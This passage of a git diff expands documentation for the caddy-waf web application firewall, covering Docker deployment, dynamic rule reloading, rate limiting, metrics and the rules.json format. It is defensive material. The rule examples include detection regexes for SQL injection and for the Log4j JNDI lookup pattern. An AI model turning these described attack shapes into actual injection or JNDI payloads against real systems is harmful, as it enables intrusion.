+WORKDIR /app/caddy-waf + +# Fetch and install the necessary Go dependencies, including Caddy and its modules and the caddy-waf plugin. +# - go get will fetch and install all required modules +# - go.mod will be used to properly build the project. +RUN go get -v github.com/caddyserver/caddy/v2 github.com/caddyserver/caddy/v2/caddyconfig/caddyfile github.com/caddyserver/caddy/v2/caddyconfig/httpcaddyfile github.com/caddyserver/caddy/v2 github.com/caddyserver/caddy/v2/modules/caddyhttp github.com/oschwald/maxminddb-golang github.com/fsnotify/fsnotify github.com/fabriziosalmi/caddy-waf + +# Clean up and update the go.mod file +# - go mod tidy will tidy up go.mod file, removing unused dependencies +RUN go mod tidy + +# Download the GeoLite2 Country database from a known location. +# - Use a reliable download location for this file. +RUN wget https://git.io/GeoLite2-Country.mmdb -O GeoLite2-Country.mmdb + +# Clean up previous build artifacts, to ensure a clean build +RUN rm -rf buildenv_* + +# Build the Caddy binary using xcaddy with the caddy-waf module. +# - This creates the custom caddy binary with the waf +RUN xcaddy build --with github.com/fabriziosalmi/caddy-waf=./ + +# --- Stage 2: Runtime Stage --- +# Use a minimal base image for the final container. +FROM alpine:latest + +# Set the working directory for the running container. +WORKDIR /app + +# Copy the Caddy binary from the builder stage. +# - This copies the executable from the builder stage +COPY --from=builder /app/caddy-waf/caddy /usr/bin/caddy + +# Copy the GeoLite2 database, rules, blacklists, and Caddyfile from the builder stage. +# - This copies the files into the /app directory in the final image. +COPY --from=builder /app/caddy-waf/GeoLite2-Country.mmdb /app/ +COPY --from=builder /app/caddy-waf/rules.json /app/ +COPY --from=builder /app/caddy-waf/ip_blacklist.txt /app/ +COPY --from=builder /app/caddy-waf/dns_blacklist.txt /app/ +COPY Caddyfile /app/ + +# Create a 'caddy' group and user, with limited privileges to improve security. +# - -S: Creates a system group and user +RUN addgroup -S caddy && adduser -S -G caddy caddy + +# Change ownership of /app to the 'caddy' user and group to ensure proper permissions are set +RUN chown -R caddy:caddy /app + +# Set the user to 'caddy' for running the container and the application. +# - all commands after this command will run with this user. +USER caddy + +# Expose the HTTP port that Caddy will listen on. +# - this does not expose the port on the host, for that use the `docker run -p` command. +EXPOSE 8080 + +# Set the command to run when the container starts. +# - `caddy run`: starts the caddy server +# --config /app/Caddyfile`: specifies the location of the Caddy configuration file. +CMD ["caddy", "run", "--config", "/app/Caddyfile"] +``` + +## Running the Docker Container -# Run the Docker container, mapping port 8080 +Once the Docker image is built, you can run a container using the following command: + +```bash docker run -p 8080:8080 caddy-waf ``` +* **`docker run`**: This is the Docker command to create and run a container from a specified image. +* **`-p 8080:8080`**: The `-p` flag maps port `8080` on the host machine to port `8080` inside the container. This makes the WAF accessible via port `8080` on your host. You can adjust this mapping as needed. For example, `-p 80:8080` will map port `80` on the host to port `8080` in the container, and `-p 8081:8080` will map port `8081` on the host to port `8080` in the container. +* **`caddy-waf`**: Specifies the name of the Docker image to run, which we built in the previous step. + +**Run Command Options:** + +* **Port Mapping:** Adjust the `-p` flag to map the correct host port to the port exposed by the container if your WAF is using a port other than `8080`. +* **Environment Variables:** Use the `-e` flag to pass environment variables to the container (e.g., `-e LOG_LEVEL=DEBUG`, `-e ANOMALY_THRESHOLD=30`). For example: `docker run -p 8080:8080 -e LOG_LEVEL=DEBUG caddy-waf`. +* **Volume Mounts:** Use the `-v` flag to mount volumes for persistent configuration or data, ensuring that changes to configuration are not lost if the container is stopped or removed. For example, `-v /my/config:/etc/caddy` mounts the host's directory `/my/config` to `/etc/caddy` inside the container. This is particularly important for logs. For example: `docker run -p 8080:8080 -v /my/config:/etc/caddy -v /my/logs:/var/log/caddy caddy-waf`. +* **Detached Mode:** Use the `-d` flag to run the container in the background: `docker run -d -p 8080:8080 caddy-waf`. +* **Container Name**: Use `--name` to specify a name for the container for easy management: `docker run --name my-waf -d -p 8080:8080 caddy-waf`. + +## Docker Compose + +For more complex deployments, use Docker Compose to configure multiple containers and their dependencies using a `docker-compose.yml` file. An example `docker-compose.yml` file is: + +```yaml +version: "3.9" +services: + waf: + image: caddy-waf + ports: + - "8080:8080" + volumes: + - ./config:/etc/caddy/ + - ./logs:/var/log/caddy/ + environment: + - LOG_LEVEL=DEBUG +``` + +To start the container using docker compose, execute `docker-compose up -d` from the directory containing the `docker-compose.yml` file. + +## Best Practices: + +* **Immutable Containers:** Treat containers as immutable units. Any changes should be done by rebuilding the image rather than modifying it inside the running container. +* **Configuration Outside the Image:** Store the WAF's configuration (e.g., `Caddyfile`, `rules.json`, blacklists) outside the container image using volume mounts. This allows for configuration updates without rebuilding the container image. +* **Persistent Logging:** Configure logging to persist logs outside the container, making them accessible to log management and analysis tools by mounting a volume to the directory where logs are written. +* **Security:** Follow Docker security best practices, such as running containers with non-root users, using a minimal base image, and keeping the container image up to date, using a specific version rather than `latest`. +* **Resource Management**: Set appropriate resource limits (CPU, memory) to ensure stable and predictable performance and prevent one container from consuming too many resources. +* **Health Checks:** Add a health check to the Dockerfile so Docker knows if the container is running correctly and automatically restarts if it fails. +* **Image Tagging:** Tag images with meaningful tags, like version numbers or build identifiers, to facilitate tracking and versioning. +* **Environment variables:** Pass sensitive information (e.g API Keys) as environment variables, rather than hardcoding them in the image. + +## Example Usage Scenarios: + +**Example with Volume Mounts:** + +```bash +docker run -p 8080:8080 -v /my/config:/etc/caddy -v /my/logs:/var/log/caddy caddy-waf +``` + +* `/my/config` on the host is mounted to `/etc/caddy` inside the container, providing external configuration files to the container. +* `/my/logs` is mounted to `/var/log/caddy`, persisting log data outside the container. + +**Example with Environment Variables:** + +```bash +docker run -p 8080:8080 -e LOG_LEVEL=DEBUG caddy-waf +``` + +* The `LOG_LEVEL` environment variable is passed to the container, which then controls the log output within the application. + +**Example using docker compose:** + +```bash +docker-compose up -d +``` + +* Starts the container using the provided `docker-compose.yml` file in detached mode. + +## Summary + +Leveraging Docker for the WAF provides a robust, scalable, and easily manageable deployment solution. By following these guidelines and best practices, you can create a production-ready containerized environment for your WAF, maximizing its efficiency and security. This extended guide will help you understand and implement the Docker support for the WAF effectively. diff --git a/docs/dynamicupdates.md b/docs/dynamicupdates.md index 7adc4b9..2d32a0b 100644 --- a/docs/dynamicupdates.md +++ b/docs/dynamicupdates.md @@ -1,7 +1,49 @@ # ๐Ÿ”„ Dynamic Updates -* Most changes to the configuration (rules, blacklists, etc) can be applied without restarting Caddy. -* File watchers monitor the changes on your rules and blacklist files and trigger the automatic reload. -* Simply modify the related files and the changes will be applied automatically by the file watcher. -* To reload configurations using the Caddy API execute `caddy reload`. +The WAF is designed to be highly flexible and allows for dynamic updates to its configuration without requiring a full restart of the Caddy server. This functionality ensures that security policies can be modified and applied rapidly in response to new threats or changing business needs, while minimizing disruption to the application. +Here's a comprehensive breakdown of how dynamic updates work: + +## Automatic Reloading via File Watchers + +* **File Monitoring:** The WAF incorporates file watchers that monitor changes on specific files, including: + * The rule file (`rules.json`) + * The IP blacklist file (`ip_blacklist.txt`) + * The DNS blacklist file (`dns_blacklist.txt`) + * The GeoIP database file (`GeoLite2-Country.mmdb`) + * The Caddyfile configuration file (if `Caddyfile` changes need to be applied) + +* **Change Detection:** When a change is detected in any of these monitored files (e.g., a file is modified, added, or deleted), the file watcher automatically triggers a reload of the WAF configuration, applying those changes. +* **Automatic Reload:** This reload process parses the modified file, updates the WAF's internal state, and applies the new settings, without needing a full restart of the server. +* **Minimal Disruption:** The automatic reload process is designed to be efficient, ensuring that changes are applied quickly with minimal disruption to ongoing requests. There will be a small period in which the rules are being reloaded. +* **Real-Time Updates:** Changes made to the files can be applied almost in real time allowing for quick responses to new vulnerabilities and attack patterns. + +## Configuration Reload via Caddy API + +In addition to file watchers, the WAF can also be dynamically reloaded using the Caddy API. This can be useful for automation or in scenarios where changes might not be reflected directly on the file system. + +* **Caddy API Endpoint:** The Caddy server exposes a `reload` endpoint, which can be used to trigger a configuration reload. +* **API Call:** To reload the configuration, an HTTP POST request is sent to the Caddy API endpoint, typically available at `localhost:2019/load` (this port can be changed in your `Caddyfile`). +* **Command:** To use this API, an easy approach is to use the command `caddy reload` which performs this HTTP POST request. +* **Manual Reload:** This process is useful when Caddy configuration changes must be applied programmatically or when file watchers may not be suitable. +* **Automation:** You can integrate this API call into your configuration management systems, enabling automated deployments and updates of the WAF configuration. + +## Practical Usage + +* **Rule Modifications:** To add a new WAF rule, modify the `rules.json` file. The file watcher will automatically detect the change, and the new rule will be loaded into the WAF. +* **Blacklist Updates:** To block new IP addresses or domains, add the entries to the appropriate files (`ip_blacklist.txt` or `dns_blacklist.txt`). The changes will be applied automatically. +* **GeoIP Database Updates:** If you need to update the GeoIP database, replace the `GeoLite2-Country.mmdb` file. +* **Caddyfile Changes:** If you made changes to the `Caddyfile` configuration file you need to use the command `caddy reload` to apply them. + +## Considerations and Best Practices + +* **File Format Validation:** The WAF includes validation mechanisms to ensure that the changes applied to the files are correctly formatted and don't cause errors when reloading. +* **Error Handling:** In the event of an error during the file parsing, the WAF will gracefully handle the situation and report the error in logs, avoiding service disruption. +* **Atomic Updates:** When making multiple changes across different files, ensure that changes are made atomically (e.g. by writing to a temporary file and then overwriting the original file), to prevent the WAF from reloading partial or incomplete configurations. +* **Testing:** After applying configuration changes, you should always test the system to make sure that the rules are working correctly and there are no unexpected consequences. +* **Permissions:** Verify the permissions for the file watcher are correct, to avoid that it does not have permissions to read the files you are trying to monitor. +* **Rate Limiting:** Be aware that while the WAF rules and blacklists can be reloaded without a full restart, the rate limiting configuration is reloaded every time you modify the Caddyfile and run `caddy reload`. + +## Summary + +The dynamic updates feature of the WAF is a critical component for flexibility and ease of management. By utilizing file watchers and the Caddy API, security policies can be rapidly updated without disruption, ensuring that the WAF can adapt to the evolving threat landscape and provide continuous protection for web applications. Understanding how these dynamic update mechanisms work and their limitations is essential for effectively managing the WAF. diff --git a/docs/geoblocking.md b/docs/geoblocking.md index f86c67f..a880b44 100644 --- a/docs/geoblocking.md +++ b/docs/geoblocking.md @@ -11,10 +11,3 @@ block_countries /path/to/GeoLite2-Country.mmdb RU CN KP # Whitelist requests from the United States whitelist_countries /path/to/GeoLite2-Country.mmdb US ``` - -* **Note:** Only one of `block_countries` or `whitelist_countries` can be enabled at a time. - -## GeoIP Lookup Fallback - -When GeoIP lookup fails, the fallback behavior is configurable using the `WithGeoIPLookupFallbackBehavior` option when instantiating the middleware. Default behavior is to log and treat the lookup as not in the list. Options are `none` to block if the lookup fails or a specific country code to fallback to. For example, setting it to `US` will allow requests from IPs if the GeoIP lookup fails and `US` was in the list of allowed countries. - diff --git a/docs/metrics.md b/docs/metrics.md index f6dd43a..4aba055 100644 --- a/docs/metrics.md +++ b/docs/metrics.md @@ -1,53 +1,118 @@ - # Rules Metrics - - You can gain insights into your WAF's behavior, optimize your ruleset, and monitor your traffic by inspecting the metrics endpoint or processing such stats with other tools. This endpoint provides detailed information about requests, rule hits, and GeoIP statistics. - - ```json - { - "allowed_requests": 1209, - "blocked_requests": 6275, - "geoip_stats": {}, - "rule_hits": { - "942440": 52, - "allow-legit-browsers": 79, - "block-scanners": 390, - "crlf-injection-headers": 8, - "header-attacks": 13, - "header-attacks-consolidated": 279, - "header-suspicious-x-forwarded-for": 39, - "idor-attacks": 401, - "insecure-deserialization-java": 13, - "jwt-tampering": 117, - "nosql-injection-attacks": 65, - "open-redirect-attempt": 179, - "path-traversal": 361, - "rce-command-injection-args": 13, - "rce-command-injection-body": 572, - "rce-commands": 234, - "rce-commands-expanded": 169, - "sensitive-files": 59, - "sensitive-files-expanded": 24, - "sql-injection": 104, - "sql-injection-comment-bypass-args": 416, - "sql-injection-improved-basic": 715, - "ssti-attacks": 65, - "unusual-paths": 373, - "xml-injection-attacks": 115, - "xss": 156, - "xss-attacks": 407, - "xss-improved-encoding": 1638 - }, - "rule_hits_by_phase": { - "1": 1297, - "2": 5759 - }, - "total_requests": 7484 - } - ``` - - * `allowed_requests`: Total number of requests that were allowed by the WAF. - * `blocked_requests`: Total number of requests that were blocked by the WAF. - * `geoip_stats`: Statistics about GeoIP lookups (if enabled). - * `rule_hits`: An object showing how many times each rule has matched a request. The keys represent the rule IDs, and the values represent the number of matches. - * `rule_hits_by_phase`: An object showing how many hits were recorded for each phase of request processing. The keys are the numeric phase identifiers, and values show the number of hits within each phase. - * `total_requests`: The total number of requests processed by the WAF. +# Metrics + +The WAF's metrics endpoint provides critical insights into its operational behavior, allowing you to analyze traffic patterns, fine-tune rule sets, and monitor performance. This data is essential for maintaining security posture and optimizing resource allocation. The metrics are available in JSON format, making them easily consumable by monitoring tools and analysis pipelines. + +Here's a comprehensive breakdown of the metrics provided: + +```json +{ + "allowed_requests": 1209, + "blocked_requests": 6275, + "geoip_stats": {}, + "rule_hits": { + "942440": 52, + "allow-legit-browsers": 79, + "block-scanners": 390, + "crlf-injection-headers": 8, + "header-attacks": 13, + "header-attacks-consolidated": 279, + "header-suspicious-x-forwarded-for": 39, + "idor-attacks": 401, + "insecure-deserialization-java": 13, + "jwt-tampering": 117, + "nosql-injection-attacks": 65, + "open-redirect-attempt": 179, + "path-traversal": 361, + "rce-command-injection-args": 13, + "rce-command-injection-body": 572, + "rce-commands": 234, + "rce-commands-expanded": 169, + "sensitive-files": 59, + "sensitive-files-expanded": 24, + "sql-injection": 104, + "sql-injection-comment-bypass-args": 416, + "sql-injection-improved-basic": 715, + "ssti-attacks": 65, + "unusual-paths": 373, + "xml-injection-attacks": 115, + "xss": 156, + "xss-attacks": 407, + "xss-improved-encoding": 1638 + }, + "rule_hits_by_phase": { + "1": 1297, + "2": 5759 + }, + "total_requests": 7484 +} +``` + +### Key Metrics: + +* **`allowed_requests` (Integer):** + * Represents the total count of HTTP requests that passed through all WAF checks without triggering any blocking rules. + * A high number of allowed requests generally indicates normal traffic flow. However, consistently high values could suggest that your WAF ruleset might need tuning to catch more sophisticated threats, or alternatively, that there is a low level of attack traffic at present. + * This metric can be crucial in determining how much normal traffic your system is handling. +* **`blocked_requests` (Integer):** + * Indicates the total number of HTTP requests that were blocked by the WAF because they matched at least one blocking rule. + * A high number of blocked requests indicates the presence of malicious activity targeting the system. + * Monitoring this metric in conjunction with rule hit counts can help identify specific attack vectors and sources. + * Spikes in this number can be an indicator of an attack in progress and should be examined immediately. +* **`geoip_stats` (Object):** + * Provides statistics about GeoIP lookups performed during request processing. This object will vary in its structure and content depending on the specific GeoIP implementation and the type of information the system collects. + * If no GeoIP lookups are enabled or no data is collected it would appear empty (`{}`). + * If enabled, this object might include the number of lookups, counts by country, specific countries that triggered blocking/whitelisting rules, or any other related insights. Example: + + ```json + "geoip_stats": { + "total_lookups": 10000, + "blocked_by_country": { + "RU": 200, + "CN": 150 + }, + "allowed_by_country":{ + "US": 5000 + } + } + ``` + * This metric is essential to understand geographical attack patterns and the effectiveness of country-based blocking/whitelisting. + * High numbers of lookups can indicate a lot of traffic originating from various regions. + +* **`rule_hits` (Object):** + * A core component of the metrics, this object provides a detailed breakdown of how many times each specific rule was triggered by incoming requests. + * The keys within this object represent unique rule identifiers (often the rule's ID or a user-defined name). + * The values associated with each key represent the number of times that particular rule was matched. + * This metric is invaluable for identifying which rules are being triggered most often, potentially indicating common attack vectors or incorrectly configured rules. + * High hit counts for specific rules indicate that they might be addressing a widespread issue or might be too sensitive and require refinement. + * Low hit counts on critical rules suggest those rules are either not performing correctly or that the particular attack is not present. + * Careful review of this information can help fine-tune the WAF ruleset, focusing on effective rules and removing unnecessary or incorrectly triggered rules. + * It is important to note that a low number of hits on a rule does not necessarily mean the rule is unnecessary; the rule may be designed to block rare, high-severity attacks that are not seen regularly. +* **`rule_hits_by_phase` (Object):** + * Provides insights into how many rules were hit at each processing phase. + * Keys are numeric phase identifiers. The specific meaning of each phase depends on the WAF architecture, but generally: + * Phase 1: Typically, pre-processing or request parsing. + * Phase 2: Usually, request analysis and rule evaluation. + * The values indicate the number of rule hits recorded in the phase. + * Helps to understand which part of the pipeline is doing most of the work, which helps determine if there is a performance issue with the pre or post processing of requests. +* **`total_requests` (Integer):** + * Represents the total number of requests that were received and processed by the WAF, regardless of whether they were allowed or blocked. + * This metric serves as a baseline for overall traffic volume. + * It can be used in conjunction with `allowed_requests` and `blocked_requests` to calculate percentages of allowed/blocked traffic and identify potential anomalies. + * Sudden changes in `total_requests` might indicate a change in traffic volume or an ongoing attack. + +### Analysis and Usage: + +* **Performance Monitoring:** Observe metrics over time to identify performance bottlenecks, high resource utilization, and potential areas for optimization. +* **Security Analysis:** Identify common attack vectors by analyzing the `rule_hits` metric and the type of blocked requests. This can also show potential gaps in the security setup. +* **Ruleset Optimization:** Refine and adjust rules based on real-world traffic patterns. Disable rules that trigger false positives or rules that are not used. +* **Alerting:** Set up alerts based on metrics thresholds. For example, get alerts when `blocked_requests` are above a certain level or a specific rule has excessive hits. +* **Capacity Planning:** Track trends to help with predicting future resource needs. +* **Compliance Auditing:** Metrics can provide data needed to satisfy security and compliance audits. +* **Dashboarding:** Visualizing metrics in a dashboard helps with daily monitoring and quick problem identification. + +### Important Considerations: + +* **Context is important:** These metrics should always be interpreted in context to fully understand them. +* **Custom Metrics:** Depending on implementation, it may be possible to add custom metrics to enhance the default ones. + +By carefully analyzing the data provided by the metrics endpoint, you gain critical insights into the effectiveness of your WAF and can make data-driven decisions to protect your applications. This information is essential for ensuring robust security and optimal performance. diff --git a/docs/ratelimit.md b/docs/ratelimit.md index 1175ec1..14fc168 100644 --- a/docs/ratelimit.md +++ b/docs/ratelimit.md @@ -1,6 +1,8 @@ # โฑ๏ธ Rate Limiting -Configure rate limits using requests count, time window, optional cleanup interval and specific paths. You can use exact paths or regex patterns for greater flexibility. You can specify to which path to apply rate limiting using the parameter `match_all_paths`, if true only matching paths will be rate limited, otherwise all paths except the matching will be rate limited: +Rate limiting is a crucial mechanism for protecting web applications from abuse, denial-of-service attacks, and brute-force login attempts. It works by restricting the number of requests a client can make within a given time period. This configuration allows for granular control over traffic flow based on client IP addresses and specific paths. + +The rate limiting functionality is configured within a `rate_limit` block, allowing fine-grained control of its behavior, as shown in the following Caddyfile example: ```caddyfile rate_limit { @@ -12,8 +14,68 @@ rate_limit { } ``` -* The rate limiter is based on the client IP address. -* The cleanup interval controls how frequently the rate limiter clears expired entries from memory. -* When the requests count is greater than the specified value for the defined period, the request will be blocked. -* Use `paths` to specify regex patterns or paths for selective rate limiting. If `match_all_paths` is set to `false`, only the specified paths will be rate-limited. If `match_all_paths` is set to `true`, all paths *except* those specified will be rate-limited. +Here's a comprehensive breakdown of the configuration options: + +### Configuration Options: + +* **`requests` (Integer):** + * Specifies the maximum number of requests allowed from a single client IP address within the defined `window`. + * A lower value makes the rate limiting stricter, reducing the number of requests allowed within the time window, while a higher value allows more requests. + * Choosing an appropriate value requires balancing protection from abusive behavior against legitimate traffic patterns. + * This value must be a positive integer. + * Example: `requests 50`, `requests 100`, `requests 500` + +* **`window` (Time Duration):** + * Defines the time window in which the `requests` limit is enforced. + * It uses standard time units (e.g., seconds, minutes, hours). + * When the number of `requests` from a given client IP exceeds the configured value within the `window`, further requests are blocked. + * Common examples include `1s`, `10s`, `1m`, `5m`, or `1h`. + * Shorter windows are suitable for stricter protection of critical resources, whereas longer windows allow for legitimate usage, but might be less effective at blocking attacks. + * Example: `window 10s`, `window 1m`, `window 30m` + +* **`cleanup_interval` (Time Duration):** + * Specifies the interval at which the rate limiter clears expired entries from its internal memory. + * Expired entries refer to client IP addresses whose request count within their time `window` has fallen below the specified `requests` limit. + * A shorter `cleanup_interval` reduces memory usage by removing expired entries more frequently, but may increase CPU load. A longer `cleanup_interval` may increase memory footprint but will lower CPU usage. + * The rate limiter should automatically cleanup expired entries as they become expired, this `cleanup_interval` configuration provides a periodic, global sweep to make sure entries are removed. + * Example: `cleanup_interval 1m`, `cleanup_interval 5m`, `cleanup_interval 15m` + +* **`paths` (Array of Strings):** + * An array of strings representing regular expressions (or exact paths) that determine which URLs should be targeted by this rate limiter. + * Each string is treated as a regular expression pattern, allowing for flexible matching of URLs. + * When this array is not empty, rate limiting will be applied based on the `match_all_paths` configuration. + * For exact paths, specify the exact URL path, such as `"/login"` or `"/api/users"`. + * For more flexible matching, use regex patterns, like `"/api/v1/.*"` (all paths under `/api/v1/`), or `"/product/\d+"` (all paths like `/product/123`). + * Example: `paths /api/v1/.* /admin/.*`, `paths /users /login`, `paths /static/.*` + +* **`match_all_paths` (Boolean):** + * Determines how rate limiting is applied to the specified paths. + * When `false` (or omitted), the rate limiting rules apply *only* to the paths matching the patterns specified in `paths`, all other paths bypass this rate limit configuration. + * When `true`, the rate limiting rules apply to *all* paths, *except* for the paths matching the patterns specified in the `paths` field. + * This option is useful when you need to rate limit most of your traffic and make exceptions for specific paths or endpoints. + * Example: `match_all_paths false`, `match_all_paths true` + +### Rate Limiting Behavior: + +* **IP-Based:** Rate limiting is enforced based on the client IP address. The rate limiter will track the number of requests per IP, not by user or any other attribute. +* **Blocking:** When the request count from a given IP address exceeds the `requests` limit within the specified `window`, subsequent requests from that IP are blocked and will return a configurable error code (by default this is a `429 - Too Many Requests`). +* **Path Matching:** The `paths` setting and the `match_all_paths` setting together determines which requests will be rate limited by the current `rate_limit` configuration block. If `match_all_paths` is false, only paths that match the patterns provided in the `paths` block will be rate limited, if it is set to true, then every request will be rate limited unless it matches a path provided in the `paths` block. +* **Non-Blocking:** If the request count from an IP does not exceed the limit, the request is allowed to proceed normally. +* **Multiple rules** It is possible to configure multiple `rate_limit` blocks, each with a different configurations. The order in which the rate limiters appear is not important. + +### Considerations and Best Practices: + +* **Choosing Limits:** Choose `requests` and `window` values carefully based on your application's normal traffic patterns and requirements. A value that is too low could cause denial of service for legitimate users, whereas a value that is too high might not provide adequate protection. +* **Monitoring:** Continuously monitor the rate limiter's effectiveness and adjust the values as needed. Use logging and metrics to gain insights into how the rate limiter performs. +* **Dynamic Rate Limiting:** For more advanced scenarios, consider implementing dynamic rate limiting, where the limits are adjusted based on real-time traffic conditions and historical patterns. +* **Multiple Rate Limiters:** It's recommended to apply different rate limit rules for various endpoints or resources based on their criticality and anticipated usage patterns. +* **Global vs. Local:** Use rate limiting along with other security methods for better protection. Also consider using rate limiting at other levels, including load balancers, and reverse proxies to provide multi-layered protection. +* **IP Spoofing:** Rate limiting based on IP addresses might be bypassed by sophisticated attackers who spoof IP addresses; take this into consideration when configuring your WAF. +* **Log information** Each time a request is rate limited, logs should provide relevant information for debugging (client IP, blocked path and other relevant information). +* **Testing:** Test rate limiting thoroughly to ensure that it does not affect legitimate users and that it is working as intended, particularly when complex path matching is involved. + +### Advanced scenarios + +* **Varying window based on request path:** It might be useful to configure different time windows and request limits based on the path that is being accessed, e.g. stricter limits on authentication endpoints and looser limits on static files. +* **Combining with other security features:** Rate limiting can be combined with other WAF features such as IP blocking, country blocking, and rule-based blocking to provide a holistic approach to security. diff --git a/docs/rules.md b/docs/rules.md index d979328..94d9757 100644 --- a/docs/rules.md +++ b/docs/rules.md @@ -1,52 +1,107 @@ - # ๐Ÿ“œ Rules Format (`rules.json`) - - Rules are defined in a JSON file as an array of objects. Each rule specifies how to match a pattern, what parts of the request to inspect, and what action to take when a match is found. - - ```json - [ - { - "id": "wordpress-brute-force", - "phase": 2, - "pattern": "(?i)(?:wp-login\\.php|xmlrpc\\.php).*?(?:username=|pwd=)", - "targets": ["URI", "ARGS"], - "severity": "HIGH", - "action": "block", - "score": 8, - "description": "Block brute force attempts targeting WordPress login and XML-RPC endpoints." - }, - { - "id": "sql-injection-header", - "phase": 1, - "pattern": "(?i)(?:select|insert|update|delete|union|drop|--|;)", - "targets": ["HEADERS:X-Attack"], - "severity": "CRITICAL", - "action": "block", - "score": 10, - "description": "Detect and block SQL injection attempts in custom header." - }, - { - "id": "log4j-jndi", - "phase": 2, - "pattern": "(?i)\\$\\{jndi:(ldap|rmi|dns):\\/\\/.*\\}", - "targets": ["BODY","ARGS","URI","HEADERS"], - "severity": "CRITICAL", - "action": "block", - "score": 10, - "description":"Detect Log4j vulnerability attempts" - } - ] - ``` - - ## Rule Fields - - | Field | Description | Example | - |---------------|--------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------| - | `id` | Unique identifier for the rule. | `sql_injection_1` | - | `phase` | Processing phase (1: Request Headers, 2: Request Body, 3: Response Headers, 4: Response Body). | `2` | - | `pattern` | Regular expression to match malicious patterns. Use `(?i)` for case insensitive matching. | `(?i)(?:select|insert|update)` | - | `targets` | Array of request parts to inspect, which can be: `URI`, `ARGS`, `BODY`, `HEADERS`, `COOKIES`, `HEADERS:`, `RESPONSE_HEADERS`, `RESPONSE_BODY`, `RESPONSE_HEADERS:`, or `COOKIES:`.| `["ARGS", "BODY"]` | - | `severity` | Severity of the rule (`CRITICAL`, `HIGH`, `MEDIUM`, `LOW`). Used only for logging and metric reporting. | `CRITICAL` | - | `action` | Action to take on match (`block` or `log`). If empty or invalid, defaults to `block`. | `block` | - | `score` | Anomaly score to add when this rule matches. | `5` | - | `description` | A descriptive text for the rule. | `Detect SQL injection` | - ``` +# ๐Ÿ“œ Rules + +The WAF's behavior is governed by a set of rules defined in a JSON file (`rules.json`). These rules specify how to identify and respond to potentially malicious requests. The rules are structured as an array of JSON objects, where each object represents an individual rule. This format allows for flexible and configurable security policies. + +Here's a detailed breakdown of the rules format, including example rules and descriptions of each field: + +```json +[ + { + "id": "wordpress-brute-force", + "phase": 2, + "pattern": "(?i)(?:wp-login\\.php|xmlrpc\\.php).*?(?:username=|pwd=)", + "targets": ["URI", "ARGS"], + "severity": "HIGH", + "action": "block", + "score": 8, + "description": "Block brute force attempts targeting WordPress login and XML-RPC endpoints." + }, + { + "id": "sql-injection-header", + "phase": 1, + "pattern": "(?i)(?:select|insert|update|delete|union|drop|--|;)", + "targets": ["HEADERS:X-Attack"], + "severity": "CRITICAL", + "action": "block", + "score": 10, + "description": "Detect and block SQL injection attempts in custom header." + }, + { + "id": "log4j-jndi", + "phase": 2, + "pattern": "(?i)\\$\\{jndi:(ldap|rmi|dns):\\/\\/.*\\}", + "targets": ["BODY","ARGS","URI","HEADERS"], + "severity": "CRITICAL", + "action": "block", + "score": 10, + "description":"Detect Log4j vulnerability attempts" + }, + { + "id": "low-score-log", + "phase": 2, + "pattern": "(?i)suspicious-keyword", + "targets": ["BODY"], + "severity": "LOW", + "action": "log", + "score": 1, + "description": "Example of a low score log rule" + }, + { + "id": "specific-header-rule", + "phase": 1, + "pattern": "(?i)attack-payload", + "targets": ["HEADERS:User-Agent"], + "severity": "MEDIUM", + "action": "block", + "score": 7, + "description": "Example blocking based on a User-Agent header payload" + }, + { + "id": "cookie-check", + "phase": 1, + "pattern": "(?i)bad_cookie", + "targets": ["COOKIES:sessionid"], + "severity": "HIGH", + "action":"block", + "score": 9, + "description":"Example of a rule that targets cookies" + }, + { + "id": "response-header-check", + "phase": 3, + "pattern": "(?i)sensitive-info", + "targets": ["RESPONSE_HEADERS:X-Server-Version"], + "severity": "MEDIUM", + "action": "log", + "score": 2, + "description": "Example of a response header rule" + } +] +``` + +## Rule Fields: A Detailed Explanation + +Each rule object contains the following fields: + +| Field | Description | Example | +|---------------|--------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------| +| **`id`** | **Unique Identifier:** This is a string that uniquely identifies the rule within the `rules.json` file. It is used for logging, metric reporting, and rule management. It should be descriptive and easy to understand. IDs must be unique across all rules. | `sql_injection_1`, `xss-filter-block`, `wordpress-login-attempt` | +| **`phase`** | **Processing Phase:** An integer indicating the phase of request/response processing in which this rule should be applied. The phases are:
* `1`: *Request Headers* (applied *before* request body processing)
* `2`: *Request Body* (applied *after* request headers have been parsed).
* `3`: *Response Headers* (applied *before* response body is sent).
* `4`: *Response Body* (applied *after* response headers have been written). The phase determines *when* the rule is evaluated. | `1`, `2`, `3`, `4` | +| **`pattern`** | **Regular Expression:** A string containing a regular expression that defines the pattern to match against the defined `targets`. The pattern must be a valid regex understood by the configured engine. Case-insensitive matching can be achieved by starting the pattern with `(?i)`. It is highly recommended to ensure the regex is performant. | `(?i)(?:select|insert|update)`, `(?i)\d{3}-\d{2}-\d{4}`, `(?:[a-zA-Z0-9_.-]+@[a-zA-Z0-9-]+.[a-zA-Z0-9-.]+)` | +| **`targets`** | **Inspection Targets:** An array of strings that specifies the parts of the request or response to inspect for a match. The possible targets are: * `URI`: The full URI of the request. * `ARGS`: The query string parameters (if any). * `BODY`: The body of the request. * `HEADERS`: All request headers are checked. * `COOKIES`: All request cookies. * `HEADERS:`: Specifically checks the value of the given header name (e.g., `HEADERS:User-Agent`, `HEADERS:X-Forwarded-For`). Header names should be case-insensitive. * `COOKIES:`: Specifically checks the value of the specified cookie (e.g., `COOKIES:sessionid`). Cookie names should be case-insensitive. * `RESPONSE_HEADERS`: All response headers are checked. * `RESPONSE_BODY`: The full response body. * `RESPONSE_HEADERS:`: Specifically checks the value of the given response header. The header name is case-insensitive. The `targets` array determines *where* the rule looks for matches. | `["ARGS", "BODY"]`, `["HEADERS:X-Custom-Header"]`, `["URI"]`, `["COOKIES:sessionid"]`, `["RESPONSE_HEADERS:Content-Type"]` | +| **`severity`** | **Severity Level:** A string representing the severity of the rule violation (`CRITICAL`, `HIGH`, `MEDIUM`, `LOW`). This is used for logging, metrics, and reporting, but does not directly impact the processing of the request, or if the rule is enabled or not. You can use these labels to prioritize analysis, filtering and alerting. | `CRITICAL`, `HIGH`, `MEDIUM`, `LOW` | +| **`action`** | **Action on Match:** A string specifying the action to take when a rule is matched. The currently supported actions are: * `block`: The request or response is blocked, and the processing of the request/response chain is terminated. * `log`: The rule match is logged, but the processing of the request/response continues normally. If this field is empty, or is set to any invalid value, it defaults to `block`. | `block`, `log` | +| **`score`** | **Anomaly Score:** An integer representing a numerical score added to an internal anomaly score counter when a rule matches. The score is used in conjunction with other rules to indicate the severity of the event. It is typically used to decide when an overall 